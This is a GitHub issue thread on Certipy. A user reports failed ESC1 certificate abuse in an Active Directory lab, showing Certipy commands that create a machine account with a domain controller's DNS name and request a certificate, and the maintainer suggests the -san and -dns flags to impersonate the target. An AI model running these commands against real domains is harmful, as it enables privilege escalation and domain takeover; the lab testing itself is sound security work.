### ISSUE TITLE
Certipy is not supplying a SAN during a certificate request

### ISSUE THREAD

**Issue by rick-engle** [ly4k/Certipy#83]
I am having some issues getting a certificate generated that sets the SAN based on the passed machines account.   I read the white paper you recommended, "Certified Pre-Owned" and created a copy of the Machine template that had the same vulnerabilities as an ESC1:
certify /vulnerable
[!] Vulnerable Certificates Templates :

    CA Name                                   : TOONDOMCA-EXT.toondom.com\toondom-TOONDOMCA-EXT-CA
    Template Name                         : Machine2
    Schema Version                         : 2
    Validity Period                           : 5 years
    Renewal Period                         : 6 weeks
    msPKI-Certificate-Name-Flag   : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag              : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage               : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions

I then created a new machine account using Certipy that has the DNSHostname attribute set:

Create a new machine account with dNSHostName containing FQDN of a DC:
certipy account create "toondom.com/test:PW123$@TOONDOMDC-EXT.toondom.com" -user fakemachine -dns TOONDOMDC-EXT.toondom.com
[*] Creating new account:
    sAMAccountName                      : fakemachine$
    unicodePwd                                : F4VQyBzrV5x3VFZu
    userAccountControl                    : 4096
    servicePrincipalName                  : HOST/fakemachine
                                          RestrictedKrbHost/fakemachine
    dnsHostName                             : TOONDOMDC-EXT.toondom.com
[*] Successfully created account 'fakemachine$' with password 

And then when I request a certificate it does **not** get a certificate with a DNS Host Name:
certipy req "toondom.com/fakemachine2$:TNlBceWMIZaFZY3v@TOONDOMCA-EXT.toondom.com" -ca "toondom-TOONDOMCA-EXT-CA" -template Machine2

[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 57
[*] Got certificate without identification
[*] Certificate has not object SID
[*] Saved certificate and private key to 'fakemachine2.pfx'

I checked the computer object in AD and it does have the DNSHostname:
Get-ADComputer fakemachine -properties dnshostname, serviceprincipalname

DistinguishedName : CN=fakemachine,CN=Computers,DC=toondom,DC=com
DNSHostName       : TOONDOMCA-EXT.toondom.com
Enabled           : True
Name              : fakemachine
ObjectClass       : computer
ObjectGUID        : d846130b-f770-4202-8eec-0e6875eebc4b
SamAccountName    : fakemachine$
SID               : S-1-5-21-1592794161-1404431384-3538185906-15102
UserPrincipalName : 

Do you spot anything I did wrong?  I have a feeling that I might have a mistake on my certificate template but it is so hard to be sure.

By the way, does Certipy have a similar function to certify /vulnerable?  I can't find anything in your docs.

Thanks,
  Rick

**Comment by ly4k** [comment]
Hello @rick-engle This is because you don't supply a SAN as parameter to Certipy. On top of that, it seems that the template doesn't require a DNS host name or a UPN. As such, the final certificate will not have any. You can try with -san "username@domain", or if you want to use a DNS host name, you can use the latest version of Certipy and then the -dns parameter :)
